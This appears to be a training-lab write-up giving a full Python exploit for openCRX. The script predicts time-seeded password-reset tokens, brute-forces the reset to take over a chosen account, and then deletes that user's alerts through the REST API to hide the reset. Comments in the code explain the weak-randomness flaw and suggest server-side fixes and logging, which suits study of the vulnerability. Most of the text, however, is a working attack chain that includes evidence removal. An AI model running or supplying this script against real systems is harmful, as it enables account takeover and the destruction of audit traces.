t=resetToken&p=CRX&s=Standard&id=guest&password1=password&password2=password

R3zk0n · October 2, 2025

Contents

    10.2.5

    Automate the entire password reset attack chain, including the deletion of any password reset alerts that are generated.

    #!/usr/bin/python3
    
    import requests
    import argparse
    from jnius import autoclass
    import time
    import json
    
    # Shared java.util.Random instance obtained through the JVM bridge (autoclass).
    # getRandomBase62() re-seeds it on every call, so it carries no state between tokens.
    rand = autoclass('java.util.Random')()
    # Candidate reset tokens: appended to by main(), iterated by resetPasswordBrute().
    token_array = []
    
    # Every request made by this script is routed through a local intercepting
    # proxy on 127.0.0.1:8080.
    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    
    def current_milli_time():
        """Return the current wall-clock time as whole milliseconds since the epoch."""
        seconds_now = time.time()
        millis_now = seconds_now * 1000
        # round() with no ndigits returns an int.
        return round(millis_now)
    
    def getRandomBase62(length, seed):
        """Return a `length`-character base62 string drawn from the shared java.util.Random.

        The generator is re-seeded with int(seed) before any character is drawn,
        so the result is a pure function of (length, seed): the same seed always
        gives the same string. That determinism is the weakness the page
        demonstrates. The script only works if the server builds its reset
        tokens the same way from a guessable seed (main() feeds millisecond
        timestamps in as seeds, so presumably the server seeds with its clock).

        Server-side remedy: generate reset tokens with a CSPRNG such as
        java.security.SecureRandom, never a time-seeded java.util.Random.
        """
        alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        rand.setSeed(int(seed))
        # One nextInt(62) draw per output character, in order.
        picked = [alphabet[rand.nextInt(62)] for _ in range(length)]
        return "".join(picked)
    
    def getDateRequest(user_role):
        """Request a password reset for `user_role` and time the request.

        Posts the account id to RequestPasswordReset.jsp and returns the
        client-side millisecond timestamps taken just before and just after the
        POST, as a (start, stop) tuple. The response itself is not inspected.
        The window presumably brackets the moment the server generated the
        reset token, which assumes client and server clocks roughly agree.
        """
        target = "http://192.168.141.126:8080/opencrx-core-CRX/RequestPasswordReset.jsp"

        print("Sending date request...")
        form = {"id": user_role}

        start = current_milli_time()
        requests.post(url=target, data=form, proxies=proxies)
        stop = current_milli_time()

        print("Password reset request sent to: " + str(user_role))
        return (start, stop)
    
    def resetPasswordBrute(args):
        """Submit every candidate in token_array to PasswordResetConfirm.jsp.

        Each candidate is sent in one POST together with args.user and
        args.password (used for both password fields). A response body that
        does not contain "Unable to reset password" is treated as success and
        ends the loop; no other check is made on the response.

        Defensive reading: the whole run is a burst of near-identical POSTs
        for one account id from one client, differing only in `t`. A cap on
        failed confirmations per account, or invalidating the outstanding
        token after a few failures, bounds this loop regardless of how the
        token is generated.
        """
        target = "http://192.168.141.126:8080/opencrx-core-CRX/PasswordResetConfirm.jsp"

        print("Starting token spray. Standby.")
        for word in token_array:
            print(word)
            payload = {
                't': word.rstrip(),
                'p': 'CRX',
                's': 'Standard',
                'id': args.user,
                'password1': args.password,
                'password2': args.password,
            }

            r = requests.post(url=target, data=payload, proxies=proxies)

            if "Unable to reset password" in r.text:
                continue

            print("Successful reset with token: %s" % word)
            break
    
    def retrieveAlerts(username, password):
        """List the alerts in `username`'s user home over the REST API and delete them.

        Both the listing GET and each DELETE authenticate as (username, password),
        i.e. with the password that was just set. Every listed object whose
        '@type' is org.opencrx.kernel.home1.Alert is deleted through its '@href',
        not only alerts related to the password reset.

        Detection note: this step removes the in-application trace of the reset
        request, so the alerts themselves cannot be relied on as evidence. What
        remains is whatever records HTTP traffic server-side: a POST to
        RequestPasswordReset.jsp, a run of POSTs to PasswordResetConfirm.jsp,
        then a GET and DELETEs under .../userHome/<user>/alert for the same
        account. Forwarding those logs off-host keeps them out of reach of the
        application account.
        """
        url_list = []
        targets = f"http://192.168.141.126:8080/opencrx-rest-CRX/org.opencrx.kernel.home1/provider/CRX/segment/Standard/userHome/{username}/alert"
        
        print("Retrieving Alerts...")
        res = requests.get(url=targets, auth=(username, password), proxies=proxies, headers={"Content-Type": "application/json"})
        # Any status other than 200 skips collection without a message.
        if res.status_code == 200:
            json_data = res.json()
            # NOTE(review): the loop count is len(json_data), the size of the decoded
            # top-level JSON value, while the index is applied to json_data['objects'].
            for i in range(len(json_data)):
                try:
                    print(json_data['objects'][i]['@type'])
                    if json_data['objects'][i]['@type'] == "org.opencrx.kernel.home1.Alert":
                        url = json_data['objects'][i]['@href']
                        url_list.append(url)
                # Bare except: any exception raised for this index is reported with
                # the same message and the entry is skipped.
                except:
                    print("Ignoring some listings...")
    
        print("Deleting Alerts...")
        for url in url_list:
            # The DELETE response is stored but never inspected.
            req = requests.delete(url=url, auth=(username, password), proxies=proxies, headers={"Content-Type": "application/json"})
        
        # Printed unconditionally, whatever the outcome of the requests above.
        print("Alerts have been deleted!")
    
    def main():
        """Parse the command line and run the three stages in order.

        1. getDateRequest() triggers a reset for --user and returns the
           millisecond window (start, stop) around that request.
        2. One 40-character candidate token is generated per millisecond in the
           half-open range [start, stop) and appended to token_array, which
           resetPasswordBrute() then submits with --password.
        3. retrieveAlerts() logs in as the user with the new password and
           deletes the alerts found in that user's home.

        The candidate count equals the elapsed milliseconds of one HTTP request,
        which is why a time-seeded token offers so little search space.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument('-u', '--user', help='Username to target', required=True)
        parser.add_argument('-p', '--password', help='Password value to set', required=True)
        args = parser.parse_args()

        start, stop = getDateRequest(args.user)
        # Width of the timing window in milliseconds (= number of candidates).
        print(stop - start)

        token_array.extend(getRandomBase62(40, seed) for seed in range(start, stop))

        resetPasswordBrute(args)
        retrieveAlerts(args.user, args.password)
    
    # Run the chain only when the file is executed as a script, not when imported.
    if __name__ == '__main__':
        main()
    
